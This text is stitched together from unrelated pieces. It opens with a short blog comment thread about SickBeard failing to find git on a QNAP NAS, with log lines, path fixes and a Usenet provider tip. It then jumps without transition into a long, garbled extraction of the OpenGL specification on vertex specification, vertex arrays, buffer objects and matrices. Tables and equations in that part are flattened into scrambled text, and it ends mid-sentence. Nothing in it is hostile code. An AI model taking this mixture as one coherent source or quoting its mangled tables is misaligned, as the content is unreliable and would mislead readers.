I’m having a little issue with Sickbeard. I’m always getting the information that Sickbed is unable to find the git executable. Sickbeard is installed on a QNAP TVS-463 with Phyton 2.7 and Optware 2.99. I have also changed the git path in die config.ini File to /share/CACHEDEV1_DATA/.qpkg/git/opt/bin/git but it still doesn’t work… Does anyone has an idea? Thank you! Tim Tim in the log the error ist May-15 20:37:35 DEBUG CHECKVERSION :: git output: /bin/sh: /share/CACHEDEV1_DATA/.qpkg/git: is a directory May-15 20:37:35 DEBUG CHECKVERSION :: Git output: /bin/sh: /share/CACHEDEV1_DATA/.qpkg/git: is a directory May-15 20:37:35 ERROR CHECKVERSION :: Output doesn’t look like a hash, not using it Tim Hi Tim, I’m sorry to hear that you’re having issues with SickBeard. I’m in the middle of moving from the US to the Netherlands, so I’m a little limited in how I can help. A quick look shows me that I’m running Optware 0.99.163 – I’m not sure what 2.99 would be? Typo? Anyhow I got it from here. I’m running Python 2.7.5. I also do not have that git path available (git however works). Git on my QNAP can be found here: On yours it’s possibly Hope this helps you find the culprit. hans Hi Hans, Thank you for your quick response! Of course I meant 0.99 in detail the same you have 0.99.163. I looked up the Optware folder put their isn’t git. But I have a git folder under /.qpkg. This is also the folder I set in the config.ini Tim That’s strange … I do not have a git folder … and since it located here, I’d suspect you might have a git.qpkg installed (there is one in the “App-Center”)? hans Hi Hans, thanks for your help. I found the folder. Since the update it has been moved to /share/CACHEDEV1_DATA/.qpkg/Optware/libexec/git-core/git However the Sickbeard seems to work. The only problem I still have is setting up an Provider. Is their anyone you prefer? Tim Hi Tim! Good to hear SickBeard is running As for service I’ve had very good experiences with GigaNews … hans Hi Hans, Thank you! Tim You’re most welcome Tim! hans
https://www.tweaking4all.com/home-theatre/qnap-sick-beard-sabnzbd-auto-download-tv-series/
CC-MAIN-2021-31
refinedweb
4,230
75.3
A Kruskal-Wallis Test is used to determine whether or not there is a statistically significant difference between the medians of three or more independent groups. It is considered to be the non-parametric equivalent of the One-Way ANOVA. This tutorial explains how to conduct a Kruskal-Wallis Test in Python. Example: Kruskal-Wall a Kruskal-Wallis Test to determine if the median growth is the same across the three groups. Step 1: Enter the data. First, we’ll create three arrays to hold our our plant measurements for each of the three groups: group1 = [7, 14, 14, 13, 12, 9, 6, 14, 12, 8] group2 = [15, 17, 13, 15, 15, 13, 9, 12, 10, 8] group3 = [6, 8, 8, 9, 5, 14, 13, 8, 10, 9] Step 2: Perform the Kruskal-Wallis Test. Next, we’ll perform a Kruskal-Wallis Test using the kruskal() function from the scipy.stats library: from scipy import stats #perform Kruskal-Wallis Test stats.kruskal(group1, group2, group3) (statistic=6.2878, pvalue=0.0431). We have sufficient evidence to conclude that the type of fertilizer used leads to statistically significant differences in plant growth.
https://www.statology.org/kruskal-wallis-test-python/
CC-MAIN-2022-21
refinedweb
191
70.84
Mark Segal Kurt Akeley 1 Introduction 1 1.1 Formatting of Optional Features . . . . . . . . . . . . . . . . . . 1 1.2 What is the OpenGL Graphics System? . . . . . . . . . . . . . . 1 1.3 Programmer’s View of OpenGL . . . . . . . . . . . . . . . . . . 2 1.4 Implementor’s View of OpenGL . . . . . . . . . . . . . . . . . . 2 1.5 Our View . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 3 1.6 Companion Documents . . . . . . . . . . . . . . . . . . . . . . . 3 2 OpenGL Operation 4 2.1 OpenGL Fundamentals . . . . . . . . . . . . . . . . . . . . . . . 4 2.1.1 Floating-Point Computation . . . . . . . . . . . . . . . . 6 2.2 GL State . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 6 2.3 GL Command Syntax . . . . . . . . . . . . . . . . . . . . . . . . 7 2.4 Basic GL Operation . . . . . . . . . . . . . . . . . . . . . . . . . 10 2.5 GL Errors . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 11 2.6 Begin/End Paradigm . . . . . . . . . . . . . . . . . . . . . . . . 12 2.6.1 Begin and End . . . . . . . . . . . . . . . . . . . . . . . 15 2.6.2 Polygon Edges . . . . . . . . . . . . . . . . . . . . . . . 19 2.6.3 GL Commands within Begin/End . . . . . . . . . . . . . 19 2.7 Vertex Specification . . . . . . . . . . . . . . . . . . . . . . . . . 20 2.8 Vertex Arrays . . . . . . . . . . . . . . . . . . . . . . . . . . . . 23 2.9 Buffer Objects . . . . . . . . . . . . . . . . . . . . . . . . . . . . 33 2.9.1 Vertex Arrays in Buffer Objects . . . . . . . . . . . . . . 38 2.9.2 Array Indices in Buffer Objects . . . . . . . . . . . . . . 39 2.9.3 Buffer Object State . . . . . . . . . . . . . . . . . . . . . 39 2.10 Rectangles . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 40 2.11 Coordinate Transformations . . . . . . . . . . . . . . . . . . . . 40 2.11.1 Controlling the Viewport . . . . . . . . . . . . . . . . . . 42 2.11.2 Matrices . . . . . . . . . . . . . . . . . . . . . . . . . . . 43 iii CONTENTS 3 Rasterization 90 3.1 Invariance . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 3.2 Antialiasing . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 92 3.2.1 Multisampling . . . . . . . . . . . . . . . . . . . . . . . 93 3.3 Points . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 95 3.3.1 Basic Point Rasterization . . . . . . . . . . . . . . . . . . 97 3.3.2 Point Rasterization State . . . . . . . . . . . . . . . . . . 101 3.3.3 Point Multisample Rasterization . . . . . . . . . . . . . . 101 3.4 Line Segments . . . . . . . . . . . . . . . . . . . . . . . . . . . 101 3.4.1 Basic Line Segment Rasterization . . . . . . . . . . . . . 102 3.4.2 Other Line Segment Features . . . . . . . . . . . . . . . . 104 3.4.3 Line Rasterization State . . . . . . . . . . . . . . . . . . 107 3.4.4 Line Multisample Rasterization . . . . . . . . . . . . . . 107 3.5 Polygons . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . 108 3.5.1 Basic Polygon Rasterization . . . . . . . . . . . . . . . . 108 3.5.2 Stippling . . . . . . . . . . . . . . . . . . . . . . . . . . 110 3.5.3 Antialiasing . . . . . . . . . . . . . . . . . . . . . . . . . 111 3.5.4 Options Controlling Polygon Rasterization . . . . . . . . 111 3.5.5 Depth Offset . . . . . . . . . . . . . . . . . . . . . . . . 111 A Invariance 304 A.1 Repeatability . . . . . . . . . . . . . . . . . . . . . . . . . . . . 304 A.2 Multi-pass Algorithms . . . . . . . . . . . . . . . . . . . . . . . 305 A.3 Invariance Rules . . . . . . . . . . . . . . . . . . . . . . . . . . . 305 A.4 What All This Means . . . . . . . . . . . . . . . . . . . . . . . . 307 B Corollaries 308 3.1 Rasterization. . . . . . . . . . . . . . . . . . . . . . . . . . . . . 90 3.2 Rasterization of non-antialiased wide points. . . . . . . . . . . . . 97 3.3 Rasterization of antialiased wide points. . . . . . . . . . . . . . . 97 3.4 Visualization of Bresenham’s algorithm. . . . . . . . . . . . . . . 102 3.5 Rasterization of non-antialiased wide lines. . . . . . . . . . . . . 105 3.6 The region used in rasterizing an antialiased line segment. . . . . 106 3.7 Operation of DrawPixels. . . . . . . . . . . . . . . . . . . . . . 127 3.8 Selecting a subimage from an image . . . . . . . . . . . . . . . . 131 3.9 A bitmap and its associated parameters. . . . . . . . . . . . . . . 149 3.10 A texture image and the coordinates used to access it. . . . . . . . 159 3.11 Multitexture pipeline. . . . . . . . . . . . . . . . . . . . . . . . . 192 ixList of Tables xLIST OF TABLES xi Introduction This document describes the OpenGL graphics system: what it is, how it acts, andwhat is required to implement it. We assume that the reader has at least a rudi-mentary understanding of computer graphics. This means familiarity with the es-sentials of computer graphics algorithms as well as familiarity with basic graphicshardware and associated terms. 12 CHAPTER 1. INTRODUCTION OpenGL Operation 42.1. OPENGL FUNDAMENTALS 5 Finally, command names, constants, and types are prefixed in the GL (by gl,GL , and GL, respectively in C) to reduce name clashes with other packages. Theprefixes are omitted in this document for clarity. 2.2 GL StateThe GL maintains considerable state. This document enumerates each state vari-able and describes how each variable can be changed. For purposes of discussion,state variables are categorized somewhat arbitrarily by their function. Although wedescribe the operations that the GL performs on the framebuffer, the framebufferis not a part of GL state. We distinguish two types of state. The first type of state, called GL serverstate, resides in the GL server. The majority of GL state falls into this category.The second type of state, called GL client state, resides in the GL client. Unlessotherwise specified, all state referred to in this document is GL server state; GL and These examples show the ANSI C declarations for these commands. In general,a command declaration has the form1 rtype is the return type of the function. The braces ({}) enclose a series of char-acters (or character pairs) of which one is selected. indicates no character. Thearguments enclosed in brackets ([args ,] and [, args]) may or may not be present. 1 The declarations shown in this document apply to ANSI C. Languages such as C++ and Adathat allow passing of argument type information admit simpler declarations and fewer entry points. The N arguments arg1 through argN have type T, which corresponds to one of thetype letters or letter pairs as indicated in table 2.1 (if there are no letters, then thearguments’ type is given explicitly). If the final character is not v, then N is givenby the digit 1, 2, 3, or 4 (if there is no digit, then the number of arguments is fixed).If the final character is v, then only arg1 is present and it is an array of N valuesof the indicated type. Finally, we indicate an unsigned type by the shorthand ofprepending a u to the beginning of the type name (so that, for instance, unsignedchar is abbreviated uchar). intable 2.2. Table 2.2: GL data types. GL types are not C types. Thus, for example, GLtype int is referred to as GLint outside this document, and is not necessarilyequivalent to the C type int. An implementation may use more bits than thenumber indicated in the table to represent a GL type. Correct interpretation ofinteger values outside the minimum range is not required, however.ptrbits is the number of bits required to represent a pointer type; in other words,types intptr and sizeiptr must be sufficiently large as to store any address. Display List Per−Vertex Operations Per− Rasteriz− Evaluator Fragment Framebuffer Primitive ation Operations Assembly Texture Memory Pixel Operations back from the framebuffer or copied from one portion of the framebuffer to another.These transfers may include some type of decoding or encoding. This ordering is meant only as a tool for describing the GL, not as a strict ruleof how the GL is implemented, and we present it only as a means to organize thevarious operations of the GL. Objects such as curved surfaces, for instance, maybe transformed before they are converted to polygons. 2.5 GL ErrorsThe GL detects only a subset of those conditions that could be considered errors.This is because in many cases error checking would adversely impact the perfor-mance of an error-free program. The command Otherwise, errors are generated only for conditions that are explicitly described inthis specification. Vertex Coordinates In Current Texture texgen texture matrix 0 Coord Set 0 Current Texture texgen texture matrix 1 Coord Set 1 Current Texture texgen texture matrix 2 Coord Set 2 Current Texture texgen texture matrix 3 Coord Set 3 Figure 2.2. Association of current values with a vertex. The heavy lined boxes rep- resent GL state. Four texture units are shown; however, multitexturing may support a different number of units depending on the implementation. Point culling; Line Segment Coordinates Point, or Polygon Line Segment, or Clipping Processed Polygon Rasterization Vertices Associated (Primitive) Data Assembly Color Processing Begin/End State itives, clipping may insert new vertices into the primitive. The vertices defining aprimitive to be rasterized have texture coordinates and colors associated with them. There is no limit on the number of vertices that may be specified between a Beginand an End. Points. A series of individual points may be specified by calling Begin with anargument value of POINTS. No special state need be kept between Begin and Endin this case, since each point is independent of previous and following points. Line Strips. A series of one or more connected line segments is specified byenclosing a series of two or more endpoints within a Begin/End pair when Begin iscalled with LINE STRIP. In this case, the first vertex specifies the first segment’sstart point while the second vertex specifies the first segment’s endpoint and thesecond segment’s start point. In general, the ith vertex (for i > 1) specifies thebeginning of the ith segment and the end of the i − 1st. The last vertex specifiesthe end of the last segment. If only one vertex is specified between the Begin/Endpair, then no primitive is generated. The required state consists of the processed vertex produced from the last ver-tex that was sent (so that a line segment can be generated from it to the currentvertex), and a boolean flag indicating if the current vertex is the first vertex. Line Loops. Line loops, specified with the LINE LOOP argument value toBegin, are the same as line strips except that a final segment is added from the finalspecified vertex to the first vertex. The additional state consists of the processedfirst vertex. Separate Lines. Individual line segments, each specified by a pair of vertices,are generated by surrounding vertex pairs with Begin and End when the valueof the argument to Begin is LINES. In this case, the first two vertices between aBegin and End pair define the first segment, with subsequent pairs of vertices eachdefining one more segment. If the number of specified vertices is odd, then the lastone is ignored. The state required is the same as for lines but it is used differently: avertex holding the first vertex of the current segment, and a boolean flag indicatingwhether the current vertex is odd or even (a segment start or end). Polygons. A polygon is described by specifying its boundary as a series ofline segments. When Begin is called with POLYGON, the bounding line segmentsare specified in the same way as line loops. Depending on the current state of theGL, a polygon may be rendered in one of several ways such as outlining its borderor filling its interior. A polygon described with fewer than three vertices does notgenerate a primitive. Only convex polygons are guaranteed to be drawn correctly by the GL. If aspecified polygon is nonconvex when projected onto the window, then the renderedpolygon need only lie within the convex hull of the projected vertices defining itsboundary. The state required to support polygons consists of at least two processed ver-tices (more than two are never required, although an implementation may usemore); this is because a convex polygon can be rasterized as its vertices arrive,before all of them have been specified. The order of the vertices is significant inlighting and polygon rasterization (see sections 2.14.1 and 3.5.1). Triangle strips. A triangle strip is a series of triangles connected along sharededges. A triangle strip is specified by giving a series of defining vertices betweena Begin/End pair when Begin is called with TRIANGLE STRIP. In this case, thefirst three vertices define the first triangle (and their order is significant, just as forpolygons). Each subsequent vertex defines a new triangle using that point alongwith two vertices from the previous triangle. A Begin/End pair enclosing fewerthan three vertices, when TRIANGLE STRIP has been supplied to Begin, producesno primitive. See figure 2.4. The state required to support triangle strips consists of a flag indicating if thefirst triangle has been completed, two stored processed vertices, (called vertex A 2 4 2 2 3 6 4 4 5 5 1 3 5 1 1. and vertex B), and a one bit pointer indicating which stored vertex will be replacedwith the next vertex. After a Begin(TRIANGLE STRIP), the pointer is initializedto point to vertex A. Each vertex sent between a Begin/End pair toggles the pointer.Therefore, the first vertex is stored as vertex A, the second stored as vertex B, thethird stored as vertex A, and so on. Any vertex after the second one sent forms atriangle from vertex A, vertex B, and the current vertex (in that order). Triangle fans. A triangle fan is the same as a triangle strip with one exception:each vertex after the first always replaces vertex B of the two stored vertices. Thevertices of a triangle fan are enclosed between Begin and End when the value ofthe argument to Begin is TRIANGLE FAN. Separate Triangles. Separate triangles are specified by placing vertices be-tween Begin and End when the value of the argument to Begin is TRIANGLES. Inthis case, The 3i + 1st, 3i + 2nd, and 3i + 3rd vertices (in that order) determinea triangle for each i = 0, 1, . . . , n − 1, where there are 3n + k vertices betweenthe Begin and End. k is either 0, 1, or 2; if k is not zero, the final k vertices areignored. For each triangle, vertex A is vertex 3i and vertex B is vertex 3i + 1.Otherwise, separate triangles are the same as a triangle strip. The rules given for polygons also apply to each triangle generated from a tri-angle strip, triangle fan or from separate triangles. Quadrilateral (quad) strips. Quad strips generate a series of edge-sharingquadrilaterals from vertices appearing between Begin and End, when Begin is 2 4 6 2 3 6 7 1 3 5 1 4 5 8 (a) (b) Figure 2.5. (a) A quad strip. (b) Independent quads. The numbers give the sequenc- ing of the vertices between Begin and End. called with QUAD STRIP. If the m vertices between the Begin and End arev1 , . . . , vm , where vj is the jth specified vertex, then quad i has vertices (in or-der) v2i , v2i+1 , v2i+3 , and v2i+2 with i = 0, . . . , bm/2c. The state required is thusthree processed vertices, to store the last two vertices of the previous quad alongwith the third vertex (the first new vertex) of the current quad, a flag to indicatewhen the first quad has been completed, and a one-bit counter to count membersof a vertex pair. See figure 2.5. A quad strip with fewer than four vertices generates no primitive. If the numberof vertices specified for a quadrilateral strip between Begin and End is odd, thefinal vertex is ignored. Separate Quadrilaterals Separate quads are just like quad strips except thateach group of four vertices, the 4j + 1st, the 4j + 2nd, the 4j + 3rd, and the4j + 4th, generate a single quad, for j = 0, 1, . . . , n − 1. The total number ofvertices between Begin and End is 4n + k, where 0 ≤ k ≤ 3; if k is not zero, thefinal k vertices are ignored. Separate quads are generated by calling Begin withthe argument value QUADS. The rules given for polygons also apply to each quad generated in a quad stripor from separate quads. The state required for Begin and End consists of an eleven-valued integer indi-cating either one of the ten possible Begin/End modes, or that no Begin/End modeis being processed. to change the value of a flag bit. If flag is zero, then the flag bit is set to FALSE; ifflag is non-zero, then the flag bit is set to TRUE. When Begin is supplied with one of the argument values POLYGON,TRIANGLES, or QUADS, each vertex specified within a Begin and End pair be-gins an edge. If the edge flag bit is TRUE, then each specified vertex begins an edgethat is flagged as boundary. If the bit is FALSE, then induced edges are flagged asnon-boundary. The state required for edge flagging consists of one current flag bit. Initially, thebit is TRUE. In addition, each processed vertex of an assembled polygonal primitivemust be augmented with a bit indicating whether or not the edge beginning on thatvertex is boundary or non-boundary. take the coordinate set to be modified as the texture parameter. texture is a symbolicconstant of the form TEXTUREi, indicating that texture coordinate set i is to bemodified. The constants obey TEXTUREi = TEXTURE0 + i (i is in the range 0 tok − 1, where k is the implementation-dependent number of texture coordinate setsdefined by MAX TEXTURE COORDS). The TexCoord commands are exactly equivalent to the corresponding Multi-TexCoord commands with texture set to TEXTURE0. Gets of CURRENT TEXTURE COORDS return the texture coordinate set definedby the value of ACTIVE TEXTURE. Specifying an invalid texture coordinate set for the texture argument of Multi-TexCoord results in undefined behavior. The current normal is set using There are several ways to set the current color and secondary color. The GLstores a current single-valued color index, as well as a current four-valued RGBAcolor and secondary color. Either the index or the color and secondary color aresignificant depending as the GL is in color index mode or RGBA mode. The modeselection is made when the GL is initialized. The commands to set RGBA colors are The Color command has two major variants: Color3 and Color4. The four valueversions set all four values. The three value versions set R, G, and B to the providedvalues; A is set to 1.0. (The conversion of integer color components (R, G, B, andA) to floating-point values is discussed in section 2.14.) The secondary color has only the three value versions. Secondary A is alwaysset to 1.0. updates the current (single-valued) color index. It takes one argument, the valueto which the current color index should be set. Values outside the (machine-dependent) representable range of color indices are not clamped. Vertex shaders (see section 2.15) can be written to access an array of 4-component generic vertex attributes in addition to the conventional attributes spec-ified previously. The first slot of this array is numbered 0, and the size of the arrayis specified by the implementation-dependent constant MAX VERTEX ATTRIBS. The commands can be used to load the given value(s) into the generic attribute at slot index, whosecomponents are named x, y, z, and w. The VertexAttrib1* family of commandssets the x coordinate to the provided single argument while setting y and z to 0 andw to 1. Similarly, VertexAttrib2* commands set x and y to the specified values,z to 0 and w to 1; VertexAttrib3* commands set x, y, and z, with w set to 1, andVertexAttrib4* commands set all four coordinates. The error INVALID VALUE isgenerated if index is greater than or equal to MAX VERTEX ATTRIBS. The commands also specify vertex attributes with fixed-point coordinates that are scaled to a nor-malized range, according to table 2.9. The VertexAttrib* entry points defined earlier can also be used to load at-tributes declared as a matrix in a vertex shader. Each column of a matrix takes upone generic 4-component attribute slot out of the MAX VERTEX ATTRIBS available slots. Matrices are loaded into these slots in column major order. Matrix columnsneed to be loaded in increasing slot numbers. Setting generic vertex attribute zero specifies a vertex; the four vertex coordi-nates are taken from the values of attribute zero. A Vertex2, Vertex3, or Vertex4command is completely equivalent to the corresponding VertexAttrib* commandwith an index of zero. Setting any other generic vertex attribute updates the currentvalues of the attribute. There are no current values for vertex attribute zero. There is no aliasing among generic attributes and conventional attributes. Inother words, an application can set all MAX VERTEX ATTRIBS generic attributesand all conventional attributes without fear of one particular attribute overwritingthe value of another attribute. The state required to support vertex specification consists of four floating-pointnumbers per texture coordinate set to store the current texture coordinates s, t, r,and q, three floating-point numbers to store the three coordinates of the currentnormal, one floating-point number to store the current fog coordinate, four floating-point values to store the current RGBA color, four floating-point values to store thecurrent RGBA secondary color, one floating-point value to store the current colorindex, and MAX VERTEX ATTRIBS − 1 four-component floating-point vectors tostore generic vertex attributes. There is no notion of a current vertex, so no state is devoted to vertex coor-dinates or generic attribute zero. The initial texture coordinates are (s, t, r, q) =(0, 0, 0, 1) for each texture coordinate set. The initial current normal has coor-dinates (0, 0, 1). The initial fog coordinate is zero. The initial RGBA color is(R, G, B, A) = (1, 1, 1, 1) and the initial RGBA secondary color is (0, 0, 0, 1).The initial color index is 1. The initial values for all generic vertex attributes are(0, 0, 0, 1). describe the locations and organizations of these arrays. For each command,type specifies the data type of the values stored in the array. Because edge flagsare always type boolean, EdgeFlagPointer has no type argument. size, whenpresent, indicates the number of values per vertex that are stored in the array.Because normals are always specified with three values, NormalPointer has nosize argument. Likewise, because color indices and edge flags are always spec-ified with a single value, IndexPointer and EdgeFlagPointer also have no sizeargument. Table 2.4 indicates the allowable values for size and type (whenpresent). For type the values BYTE, SHORT, INT, FLOAT, and DOUBLE indicatetypes byte, short, int, float, and double, respectively; and the valuesUNSIGNED BYTE, UNSIGNED SHORT, and UNSIGNED INT indicate types ubyte,ushort, and uint, respectively. The error INVALID VALUE is generated if sizeis specified with a value other than that indicated in the table. The index parameter in the VertexAttribPointer command identifies thegeneric vertex attribute array being described. The error INVALID VALUE is gener-ated if index is greater than or equal to MAX VERTEX ATTRIBS. The normalized pa-rameter in the VertexAttribPointer command identifies whether fixed-point types Table 2.4: Vertex array sizes (values per vertex) and data types. The ”normalized”column indicates whether fixed-point types are accepted directly or normalizedto [0, 1] (for unsigned types) or [−1, 1] (for signed types). For generic vertex at-tributes, fixed-point data are normalized if and only if the VertexAttribPointernormalized flag is set. where index identifies the generic vertex attribute array to enable or disable.The error INVALID VALUE is generated if index is greater than or equal toMAX VERTEX ATTRIBS. The command Specifying an invalid texture generates the error INVALID ENUM. Valid valuesof texture are the same as for the MultiTexCoord commands described in sec-tion 2.7. The command transfers the ith element of every enabled array to the GL. The effect ofArrayElement(i) is the same as the effect of the command sequence with one exception: the current normal coordinates, color, secondary color, colorindex, edge flag, fog coordinate, texture coordinates, and generic attributes areeach indeterminate after execution of DrawArrays, if the corresponding array is enabled. Current values corresponding to disabled arrays are not modified by theexecution of DrawArrays. Specifying f irst < 0 results in undefined behavior. Generating the errorINVALID VALUE is recommended in this case. The command The command with one exception: the current normal coordinates, color, secondary color, colorindex, edge flag, fog coordinate, texture coordinates, and generic attributes are eachindeterminate after the execution of DrawElements, if the corresponding array isenabled. Current values corresponding to disabled arrays are not modified by theexecution of DrawElements. The command The command is a restricted form of DrawElements. mode, count, type, and indices match thecorresponding arguments to DrawElements, with the additional constraint that allvalues in the array indices must lie between start and end inclusive. Implementations denote recommended maximum amounts of vertex and indexdata, which may be queried by calling GetIntegerv with the symbolic constantsMAX ELEMENTS VERTICES and MAX ELEMENTS INDICES. If end − start + 1 isgreater than the value of MAX ELEMENTS VERTICES, or if count is greater thanthe value of MAX ELEMENTS INDICES, then the call may operate at reduced per-formance. There is no requirement that all vertices in the range [start, end] bereferenced. However, the implementation may partially process unused vertices,reducing performance from what could be achieved with an optimal index set. The error INVALID VALUE is generated if end < start. Invalid mode, count,or type parameters generate the same errors as would the corresponding call toDrawElements. It is an error for indices to lie outside the range [start, end], butimplementations may not check for this. Such indices will cause implementation-dependent behavior. The command efficiently initializes the six arrays and their enables to one of 14 con-figurations. format must be one of 14 symbolic constants: V2F,V3F, C4UB V2F, C4UB V3F, C3F V3F, N3F V3F, C4F N3F V3F, T2F V3F,T4F V4F, T2F C4UB V3F, T2F C3F V3F, T2F N3F V3F, T2F C4F N3F V3F, orT4F C4F N3F V4F. The effect of f ormat et ec en st sc sv tc V2F False False False 2 V3F False False False 3 C4UB V2F False True False 4 2 UNSIGNED BYTE C4UB V3F False True False 4 3 UNSIGNED BYTE C3F V3F False True False 3 3 FLOAT N3F V3F False False True 3 C4F N3F V3F False True True 4 3 FLOAT T2F V3F True False False 2 3 T4F V4F True False False 4 4 T2F C4UB V3F True True False 2 4 3 UNSIGNED BYTE T2F C3F V3F True True False 2 3 3 FLOAT T2F N3F V3F True False True 2 3 T2F C4F N3F V3F True True True 2 4 3 FLOAT T4F C4F N3F V4F True True True 4 4 4 FLOAT f ormat pc pn pv s V2F 0 2f V3F 0 3f C4UB V2F 0 c c + 2f C4UB V3F 0 c c + 3f C3F V3F 0 3f 6f N3F V3F 0 3f 6f C4F N3F V3F 0 4f 7f 10f T2F V3F 2f 5f T4F V4F 4f 8f T2F C4UB V3F 2f c + 2f c + 5f T2F C3F V3F 2f 5f 8f T2F N3F V3F 2f 5f 8f T2F C4F N3F V3F 2f 6f 9f 12f T4F C4F N3F V4F 4f 8f 11f 15f DisableClientState(NORMAL ARRAY); EnableClientState(VERTEX ARRAY); VertexPointer(sv , FLOAT, str, pointer + pv ); } If the number of supported texture units (the value of MAX TEXTURE COORDS)is m and the number of supported generic vertex attributes (the value ofMAX VERTEX ATTRIBS) is n, then the client state required to implement vertexarrays consists of an integer for the client active texture unit selector, 7 + m + nboolean values, 7 + m + n memory pointers, 7 + m + n integer stride values,7 + m + n symbolic constants representing array types, 3 + m + n integers repre-senting values per element, and n boolean values indicating normalization. In theinitial state, the client active texture unit selector is TEXTURE0, the boolean valuesare each false, the memory pointers are each NULL, the strides are each zero, thearray types are each FLOAT, and the integers representing values per element areeach four. returns n previously unused buffer object names in buffers. These names aremarked as used, for the purposes of GenBuffers only, but they acquire buffer stateonly when they are first bound, just as if they were unused. While a buffer object is bound, any GL operations on that object affect anyother bindings of that object. If a buffer object is deleted while it is bound, allbindings to that object in the current context (i.e. in the thread that called Delete-Buffers) are reset to zero. Bindings to that buffer in other contexts and otherthreads are not affected, but attempting to use a deleted buffer in another thread produces undefined results, including but not limited to possible GL errors andrendering corruption. Using a deleted buffer in another context or thread may not,however, result in program termination. The data store of a buffer object is created and initialized by calling STREAM DRAW The data store contents will be specified once by the application, and used at most a few times as the source for GL drawing and image speci- fication commands. STREAM READ The data store contents will be specified once by reading data from the GL, and queried at most a few times by the application. STREAM COPY The data store contents will be specified once by reading data from the GL, and used at most a few times as the source for GL drawing and image specification commands. STATIC DRAW The data store contents will be specified once by the application, and used many times as the source for GL drawing and image specification commands. STATIC READ The data store contents will be specified once by reading data from the GL, and queried many times by the application. STATIC COPY The data store contents will be specified once by reading data from the GL, and used many times as the source for GL drawing and image specification commands. DYNAMIC DRAW The data store contents will be respecified repeatedly by the ap- plication, and used many times as the source for GL drawing and image specification commands. Name Value BUFFER SIZE size BUFFER USAGE usage BUFFER ACCESS READ WRITE BUFFER MAPPED FALSE BUFFER MAP POINTER NULL DYNAMIC READ The data store contents will be respecified repeatedly by reading data from the GL, and queried many times by the application. DYNAMIC COPY The data store contents will be respecified repeatedly by reading data from the GL, and used many times as the source for GL drawing and image specification commands. usage is provided as a performance hint only. The specified usage value doesnot constrain the actual usage pattern of the data store. BufferData deletes any existing data store, and sets the values of the bufferobject’s state variables as shown in table 2.7. Clients must align data elements consistent with the requirements of the clientplatform, with an additional base-level requirement that an offset within a buffer toa datum comprising N basic machine units be a multiple of N . If the GL is unable to create a data store of the requested size, the errorOUT OF MEMORY is generated. To modify some or all of the data contained in a buffer object’s data store, theclient may use the command with target set to ARRAY BUFFER. offset and size indicate the range of data in thebuffer object that is to be replaced, in terms of basic machine units. data specifies aregion of client memory size basic machine units in length, containing the data thatreplace the specified buffer range. An INVALID VALUE error is generated if offsetor size is less than zero, or if offset + size is greater than the value of BUFFER SIZE. The entire data store of a buffer object can be mapped into the client’s addressspace by calling Name Value BUFFER ACCESS access BUFFER MAPPED TRUE BUFFER MAP POINTER pointer to the data store relinquished by calling basic machine units, into the data store of the buffer object. This offset is computedby subtracting a null pointer from the pointer value, where both pointers are treatedas pointers to basic machine units. It is acceptable for vertex or attrib arrays to be sourced from any combinationof client memory and various buffer objects during a single rendering operation. Attempts to source data from a currently mapped buffer object will generate anINVALID OPERATION error. The state of each buffer object consists of a buffer size in basic machine units,a usage parameter, an access parameter, a mapped boolean, a pointer to the mappedbuffer (NULL if unmapped), and the sized array of basic machine units for the bufferdata. 2.10 RectanglesThere is a set of GL commands to support efficient specification of rectangles astwo corner vertices. Each command takes either four arguments organized as two consecutive pairs of(x, y) coordinates, or two pointers to arrays each of which contains an x valuefollowed by a y value. The effect of the Rect command Rect (x1 , y1 , x2 , y2 ); Begin(POLYGON); Vertex2(x1 , y1 ); Vertex2(x2 , y1 ); Vertex2(x2 , y2 ); Vertex2(x1 , y2 ); End(); Normalized Object Model−View Eye Projection Clip Perspective Device Coordinates Coordinates Coordinates Division Coordinates Matrix Matrix Viewport Window Transformation Coordinates Figure 2.6 diagrams the sequence of transformations that are applied to ver-tices. The vertex coordinates that are presented to the GL are termed object co-ordinates. The model-view matrix is applied to these coordinates to yield eye co-ordinates. Then another matrix, called the projection matrix, is applied to eyecoordinates to yield clip coordinates. A perspective division is carried out on clipcoordinates to yield normalized device coordinates. A final viewport transforma-tion is applied to convert these coordinates into window coordinates. Object coordinates, eye coordinates, and clip coordinates are four-dimensional,consisting of x, y, z, and w coordinates (in that order). The model-view and pro-jection matrices are thus 4 × 4. xo yo If a vertex in object coordinates is given by zo and the model-view matrix wois M , then the vertex’s eye coordinates are found as xe xo ye yo ze = M zo . we wo Similarly, if P is the projection matrix, then the vertex’s clip coordinates are xc xe yc ye zc = P ze . wc we xw (px /2)xd + ox yw = (py /2)yd + oy . zw [(f − n)/2]zd + (n + f )/2 The factor and offset applied to zd encoded by n and f are set using Each of n and f are clamped to lie within [0, 1], as are all arguments of type clampdor clampf. zw is taken to be represented in fixed-point with at least as many bitsas there are in the depth buffer of the framebuffer. We assume that the fixed-pointrepresentation used represents each value k/(2m − 1), where k ∈ {0, 1, . . . , 2m −1}, as k (e.g. 1.0 is represented in binary as a string of all ones). Viewport transformation parameters are specified using where x and y give the x and y window coordinates of the viewport’s lower leftcorner and w and h give the viewport’s width and height, respectively. The viewportparameters shown in the above equations are found from these values as ox =x + w/2 and oy = y + h/2; px = w, py = h. 2.11.2 MatricesThe projection matrix and model-view matrix are set and modified with a varietyof commands. The affected matrix is determined by the current matrix mode. Thecurrent matrix mode is set with a1 a5 a9 a13 a2 a6 a10 a14 . a3 a7 a11 a15 a4 a8 a12 a16(This differs from the standard row-major C ordering for matrix elements. If thestandard ordering is used, all of the subsequent transformation equations are trans-posed, and the columns representing vectors become rows.) The specified matrix replaces the current matrix with the one pointed to. Mult-Matrix takes the same type argument as LoadMatrix, but multiplies the current matrix by the one pointed to and replaces the current matrix with the product. If Cis the current matrix and M is the matrix pointed to by MultMatrix’s argument,then the resulting current matrix, C 0 , is C 0 = C · M. The commands void LoadTransposeMatrix{fd}( T m[16] ); void MultTransposeMatrix{fd}( T m[16] );take pointers to 4×4 matrices stored in row-major order as 16 consecutive floating-point values, i.e. as a1 a2 a3 a4 a5 a6 a7 a8 . a9 a10 a11 a12 a13 a14 a15 a16 The effect of 